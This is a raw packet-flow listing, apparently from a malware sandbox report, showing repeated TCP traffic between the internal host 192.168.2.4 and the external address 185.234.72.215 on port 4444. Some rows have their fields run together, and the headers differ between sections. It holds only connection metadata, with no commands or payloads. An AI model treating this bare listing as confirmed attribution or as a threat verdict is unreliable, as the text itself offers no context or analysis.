                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938559055 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938565016 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938575029 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938584089 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938591957 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938599110 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938611031 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:39.938651085 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:40.021472931 CET444449926185.234.72.215192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Jan 4, 2025 00:02:40.021492958 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021502018 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021560907 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021575928 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021589041 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021600008 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021626949 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021641970 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021691084 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021697044 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021738052 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021823883 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021832943 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021869898 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021878958 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021888018 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021898031 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.021934032 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.021934032 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022116899 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022125959 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022139072 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022147894 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022157907 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022169113 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022178888 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022185087 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022192001 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022201061 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022208929 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022255898 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022402048 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022434950 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022445917 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022456884 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022496939 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022496939 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022516966 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022526979 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022536993 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022546053 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022557020 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022583961 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022600889 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022671938 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022733927 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022741079 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022754908 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022799969 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022823095 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022833109 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022842884 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022851944 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.022864103 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.022890091 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.023066044 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023085117 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023094893 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023103952 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023113966 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023123026 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023138046 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023144960 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.023154020 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023164988 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023174047 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.023225069 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.023380995 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023416996 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023427010 CET  4444         49926      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.023444891 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.023475885 CET  49926        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.495439053 CET  49913        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.502867937 CET  4444         49913      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.591126919 CET  49908        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.596018076 CET  4444         49908      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.769721985 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.840764999 CET  49909        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.865746975 CET  49909        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:40.872730017 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872744083 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872766018 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872775078 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872783899 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872792959 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872802019 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872809887 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872818947 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872827053 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872848988 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872857094 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872864962 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872873068 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872884035 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872889996 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872890949 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872891903 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872895956 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872904062 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872915983 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872931957 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872940063 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872948885 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872956991 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872965097 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872972012 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:40.872981071 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.540962934 CET  49913        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:41.545785904 CET  4444         49913      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.607065916 CET  49908        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:41.611866951 CET  4444         49908      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.785048962 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.858999968 CET  49909        4444       192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:41.863965988 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.863977909 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.864032984 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.864042044 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.864051104 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.864058971 CET  4444         49909      185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:41.864114046 CET  4444         49909      185.234.72.215  192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864124060 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864146948 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864155054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864188910 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864226103 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864233971 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864242077 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864276886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864285946 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864351988 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864360094 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864454985 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864463091 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.864473104 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.970326900 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975215912 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975228071 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975285053 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975307941 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975323915 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975362062 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975375891 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975389004 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975486994 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975495100 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975560904 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.975570917 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980278969 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980292082 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980321884 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980333090 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980343103 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980351925 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980650902 CET444449926185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:41.980761051 CET499264444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.557332993 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.562206984 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.611624002 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.616426945 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.790328026 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.853703022 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.861248970 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866154909 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866167068 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866277933 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866286993 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866307974 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866317034 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866327047 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866355896 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866472960 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866482019 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866516113 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866523981 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866532087 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866540909 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866642952 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.866652012 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.870846033 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.870855093 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.870903969 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.870913029 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:42.870922089 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.615427971 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.618988991 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.620227098 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.623819113 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.797265053 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.843715906 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.861176014 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866210938 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866225004 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866241932 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866259098 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866323948 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866337061 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866379023 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866424084 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866503954 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866525888 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866584063 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866592884 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866664886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.866681099 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.870899916 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.870946884 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.870991945 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.871051073 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.871084929 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.871140003 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.871180058 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:43.871233940 CET444449909185.234.72.215192.168.2.4
Timestamp                           SPort  DPort  Source IP       Dest IP
Jan 4, 2025 00:02:43.871248960 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:43.871301889 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:43.871339083 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:43.871392965 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:43.871408939 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:44.704349995 CET  49908  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:44.704577923 CET  49913  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:44.709117889 CET  4444   49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:44.709343910 CET  4444   49913  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:44.883548975 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:44.949249029 CET  49909  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:45.119420052 CET  49909  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:45.124305010 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124316931 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124375105 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124383926 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124423027 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124432087 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124479055 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124488115 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124532938 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124541044 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124614954 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124624014 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124670029 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124677896 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124723911 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124733925 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124768972 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124777079 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124819994 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124829054 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124866962 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124876022 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124922991 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.124931097 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.128995895 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.129004955 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.129014015 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.722124100 CET  49913  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:45.722315073 CET  49908  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:45.727067947 CET  4444   49913  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.727145910 CET  4444   49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.900019884 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.952825069 CET  49909  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:45.957803011 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957815886 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957834005 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957842112 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957859993 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957876921 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957959890 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.957968950 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958010912 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958019972 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958066940 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958075047 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958113909 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958122969 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958137989 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958165884 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958195925 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958204031 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958255053 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958265066 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958307028 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958316088 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958359957 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.958369017 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.962538004 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.962549925 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.962567091 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:45.962575912 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.300103903 CET  4444   49733  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.311178923 CET  49947  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.316979885 CET  4444   49947  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.317049026 CET  49947  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.317306995 CET  49947  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.322065115 CET  4444   49947  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.429702997 CET  49733  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.732151031 CET  49908  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.732305050 CET  49913  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.737025976 CET  4444   49908  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.737294912 CET  4444   49913  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.910428047 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.946088076 CET  4444   49947  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:46.947355986 CET  49947  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:46.952186108 CET  4444   49947  185.234.72.215  192.168.2.4
